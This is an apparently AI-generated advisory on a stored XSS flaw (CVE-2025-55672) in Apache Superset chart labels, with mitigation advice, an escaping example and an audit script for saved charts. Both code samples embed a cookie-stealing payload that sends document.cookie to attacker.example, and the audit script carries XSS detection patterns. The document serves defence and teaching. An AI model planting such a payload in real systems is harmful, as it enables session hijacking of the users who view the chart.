CVE-2025-55672
Apache Superset vulnerability analysis and mitigation

Overview

A stored Cross-Site Scripting (XSS) vulnerability (CVE-2025-55672) was discovered in Apache Superset's chart visualization feature and affects versions before 5.0.0. The vulnerability was disclosed on August 14, 2025, by Daniel Gaspar (OSS Security).

Technical details

The vulnerability exists in Apache Superset's chart visualization. An authenticated user with chart editing permissions can store a malicious payload in a column label. The label is neither sanitized nor escaped before it is rendered, so the payload executes in the browser of any user who hovers over the affected chart, for example while viewing a dashboard that embeds it. Because the script runs inside the victim's session, it can hijack that session or perform arbitrary actions in Superset with the victim's privileges (OSS Security).
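The following is an added illustrative example and not Apache Superset's own code: a minimal chart-tooltip renderer showing the stored-XSS pattern described above (an untrusted label interpolated into tooltip markup) next to a hardened version that escapes the label. The function names, the allowed-tag list and the sample labels are assumptions constructed for the example.

```javascript
// Added illustrative example, not Apache Superset's code. Function and
// variable names are assumptions chosen for this demonstration.

// Constructed sample labels: one benign, one carrying a payload such as a
// chart editor could save in a column label.
const BENIGN_LABEL = "Revenue (USD)";
const MALICIOUS_LABEL =
  '<img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">';

// Vulnerable pattern: the untrusted label is interpolated straight into HTML
// that a hover handler later assigns to tooltip.innerHTML. The browser parses
// the <img> tag and fires onerror in the viewer's session.
function renderTooltipUnsafe(label, value) {
  return `<div class="tooltip"><b>${label}</b>: ${value}</div>`;
}

// Hardened pattern: escape the five HTML-significant characters before
// interpolation, so the label is displayed as literal text, never as markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderTooltipSafe(label, value) {
  return `<div class="tooltip"><b>${escapeHtml(label)}</b>: ${escapeHtml(value)}</div>`;
}

// A cheap regression check: does the produced markup contain any tag other
// than the ones the renderer itself emits? Anything else came from user data.
const ALLOWED_TAGS = new Set(["div", "/div", "b", "/b"]);
function containsForeignTag(html) {
  const tags = [...html.matchAll(/<\s*(\/?[a-zA-Z][a-zA-Z0-9]*)/g)]
    .map((m) => m[1].toLowerCase());
  return tags.some((t) => !ALLOWED_TAGS.has(t));
}

// Demonstration when run directly with node.
console.log("unsafe:", renderTooltipUnsafe(MALICIOUS_LABEL, 42));
console.log("safe:  ", renderTooltipSafe(MALICIOUS_LABEL, 42));
console.log("foreign tag in unsafe output:",
  containsForeignTag(renderTooltipUnsafe(MALICIOUS_LABEL, 42)));
console.log("foreign tag in safe output:  ",
  containsForeignTag(renderTooltipSafe(MALICIOUS_LABEL, 42)));
```

The escaping step is the whole fix for this class of bug: the same label string is stored either way, and what changes is whether the renderer treats it as markup or as text. A check like `containsForeignTag` is worth keeping in a chart library's unit tests so that a later refactor cannot quietly reintroduce raw interpolation.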

Impact

Exploitation requires only that a victim hover over an affected chart; no further interaction is needed. The injected JavaScript runs inside the victim's session, so an attacker can hijack that session or act within Superset with the victim's privileges, which is most damaging when the viewer holds an administrative role (OSS Security). The attacker must already hold chart editing permissions, so this is a path from a low-privileged chart editor to every user who views the chart, not an unauthenticated attack.

Mitigation and workarounds

Users are recommended to upgrade to Apache Superset version 5.0.0 or later, which contains the fix for this vulnerability (OSS Security). Until the upgrade is complete, limit chart editing permissions to trusted users and review existing saved charts for column or metric labels that contain HTML or script, since a payload stored before the upgrade remains in the chart definition.
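An added example, not part of the original advisory or of Apache Superset, of the review step above: an offline audit that walks saved chart definitions and flags string values that look like HTML or script. It assumes chart definitions are available as JSON (for example the `params` field of each chart returned by the Superset chart API, or a chart export); the sample charts and their field names are constructed for the example and only approximate Superset's adhoc-metric format.

```javascript
// Added example, not Apache Superset's code. The chart list format and the
// field names in SAMPLE_CHARTS are assumptions constructed for this demo.

// Patterns that have no business in a human-readable column or metric label.
// This is a heuristic: expect false positives from SQL comparisons such as
// "a < b" inside SQL expressions, and review each hit manually.
const SUSPICIOUS = [
  /<\s*\/?[a-zA-Z]/,      // an HTML tag opener such as <img or </script
  /\bon[a-z]+\s*=/i,      // inline event handler such as onerror=
  /javascript\s*:/i,      // javascript: URL scheme
  /&#x?[0-9a-f]+;/i,      // numeric entity that may decode to markup
];

function looksLikeMarkup(s) {
  return SUSPICIOUS.some((re) => re.test(s));
}

// Recursively visit every string value in a parsed params object and return
// the JSON path of each suspicious one.
function findSuspiciousStrings(node, path = "$") {
  const hits = [];
  if (typeof node === "string") {
    if (looksLikeMarkup(node)) hits.push({ path, value: node });
  } else if (Array.isArray(node)) {
    node.forEach((v, i) => hits.push(...findSuspiciousStrings(v, `${path}[${i}]`)));
  } else if (node && typeof node === "object") {
    for (const [k, v] of Object.entries(node)) {
      hits.push(...findSuspiciousStrings(v, `${path}.${k}`));
    }
  }
  return hits;
}

// Audit a list of charts. Each chart has an id, a slice_name and params.
// Superset stores params as a JSON-encoded string; tolerate both a string
// and an already-parsed object, and scan unparseable strings as-is.
function auditCharts(charts) {
  const findings = [];
  for (const chart of charts) {
    let params = chart.params;
    if (typeof params === "string") {
      try { params = JSON.parse(params); } catch { params = chart.params; }
    }
    for (const hit of findSuspiciousStrings(params)) {
      findings.push({ chartId: chart.id, sliceName: chart.slice_name, ...hit });
    }
  }
  return findings;
}

// Constructed sample data: one clean chart and one carrying a payload in an
// adhoc metric label. Not real Superset export data.
const SAMPLE_CHARTS = [
  {
    id: 11,
    slice_name: "Monthly revenue",
    params: JSON.stringify({
      viz_type: "echarts_timeseries_line",
      metrics: [{ expressionType: "SQL", sqlExpression: "SUM(amount)", label: "Revenue (USD)" }],
    }),
  },
  {
    id: 12,
    slice_name: "Top customers",
    params: JSON.stringify({
      viz_type: "table",
      metrics: [{
        expressionType: "SQL",
        sqlExpression: "COUNT(*)",
        label: "<img src=x onerror=\"fetch('//attacker.example/?c='+document.cookie)\">",
      }],
      columns: ["customer_name"],
    }),
  },
];

// Demonstration when run directly with node: one line per finding.
for (const f of auditCharts(SAMPLE_CHARTS)) {
  console.log(`chart ${f.chartId} (${f.sliceName}) ${f.path}: ${JSON.stringify(f.value)}`);
}
```

Run this against the full chart list before and after the upgrade: the upgrade stops the label from executing, but a payload a chart editor planted earlier stays in the saved definition until someone removes it, and each hit also points at the account that saved the chart.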

Source: This report was generated using AI.
